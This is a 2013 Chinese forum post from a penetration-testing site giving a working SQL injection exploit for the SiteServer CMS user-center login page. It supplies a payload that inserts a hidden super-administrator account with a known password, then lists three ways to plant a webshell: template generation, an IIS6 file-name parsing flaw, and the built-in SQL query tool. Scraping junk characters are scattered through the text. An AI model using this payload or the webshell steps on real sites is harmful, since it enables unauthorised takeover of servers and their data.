中国网络渗透测试联盟

标题: SiteServer CMS UserCenter/login.aspx页面用户名处sql注射 [打印本页]

作者: admin    时间: 2013-2-16 21:40
标题: SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版% D; S# T" X  q9 v
stieserver官网:www.siteserver.cn
' r4 ]+ O; h) y9 W# |% \' HEXP:. I7 i& D2 ^4 j$ w* @" E
直接访问UserCenter/login.aspx6 t! q# M7 X( O; {5 Z+ K  u4 Y
用户名处输入:# w0 W5 c* N# Z8 n, O& s, T
$ Z% m; L! O3 n' Q! e: B( l
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–% V2 U8 S* ?1 x
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
( P) l' \* z. [+ i. J' Q2 X之后再访问后台SiteServer/login.aspx用插入的用户登陆& b  R- |1 g/ j
后台拿webshell的三种方法:
1 N1 F9 |, Y& L; o+ \1 z一、, n$ C8 W" u, Q0 Q
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx. O0 w5 m& v$ C9 \  ~
二、
& I9 \6 b+ C* P6 y' @% K# o3 [成员权限-》添加用户-》用户名为:1.asp, x& o) R3 r( j- d# e
http://127.0.0.1/usercenter/! ]- B& [9 f5 m3 r: h0 u8 _8 q
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
: k; B: z2 q3 e(ps:后台添加用户时不会验证是否含有非法字符)/ x; N% R  ]3 H) Y$ I/ q7 R
三、
0 C6 \! B# e) a& M, `/ N( U5 U系统工具-》实用工具-》机器参数查看
! D- J1 d3 A3 z! X+ s5 R可以看到数据库类型、名称,WEB路径0 d7 {; I* y2 o& ^
系统工具-》数据库工具-》SQL语句查询1 ]7 d/ F+ e- C+ D) {5 {9 P8 B* _* @
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2